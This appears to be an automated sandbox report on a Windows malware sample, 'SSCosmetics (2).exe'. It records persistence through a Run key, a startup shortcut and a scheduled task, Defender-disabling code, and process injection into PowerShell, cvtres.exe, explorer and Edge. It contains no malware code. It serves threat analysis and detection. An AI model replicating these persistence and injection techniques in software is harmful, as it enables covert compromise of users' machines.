Malware Analysis Report

2025-03-14 23:15

Sample ID 240407-wzdjwsah2s
Target SSCosmetics (2).exe
SHA256 1fd1e3eceac872dffbc901adfba60312f30068884c2ef3ae8f15d6ce6f7aa474
Tags
persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1fd1e3eceac872dffbc901adfba60312f30068884c2ef3ae8f15d6ce6f7aa474

Threat Level: Known bad

The file SSCosmetics (2).exe was found to be: Known bad.

Malicious Activity Summary

persistence

Contains code to disable Windows Defender

Checks computer location settings

Executes dropped EXE

Drops startup file

Adds Run key to start application

Looks up external IP address via web service

Suspicious use of SetThreadContext

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Suspicious behavior: AddClipboardFormatListener

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Creates scheduled task(s)

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Uses Task Scheduler COM API

Modifies Internet Explorer settings

Modifies registry class

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-07 18:21

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-07 18:21

Reported

2024-04-07 18:38

Platform

win10v2004-20240226-en

Max time kernel

433s

Max time network

458s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\System.exe N/A
N/A N/A C:\Users\Admin\System.exe N/A
N/A N/A C:\Users\Admin\System.exe N/A
N/A N/A C:\Users\Admin\System.exe N/A
N/A N/A C:\Users\Admin\System.exe N/A
N/A N/A C:\Users\Admin\System.exe N/A
N/A N/A C:\Users\Admin\System.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\System.exe" C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4404 set thread context of 3828 N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\explorer.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 C:\Windows\explorer.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\System.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\System.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4404 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4404 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4404 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4404 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4404 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4404 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4404 wrote to memory of 4408 N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4404 wrote to memory of 4408 N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4404 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe C:\Windows\System32\schtasks.exe
PID 4404 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe C:\Windows\System32\schtasks.exe
PID 4404 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4404 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4404 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4404 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4404 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4404 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4404 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4404 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3828 wrote to memory of 960 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3828 wrote to memory of 960 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3828 wrote to memory of 960 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 960 wrote to memory of 1924 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\explorer.exe
PID 960 wrote to memory of 1924 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\explorer.exe
PID 960 wrote to memory of 1924 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\explorer.exe
PID 3828 wrote to memory of 1932 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3828 wrote to memory of 1932 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
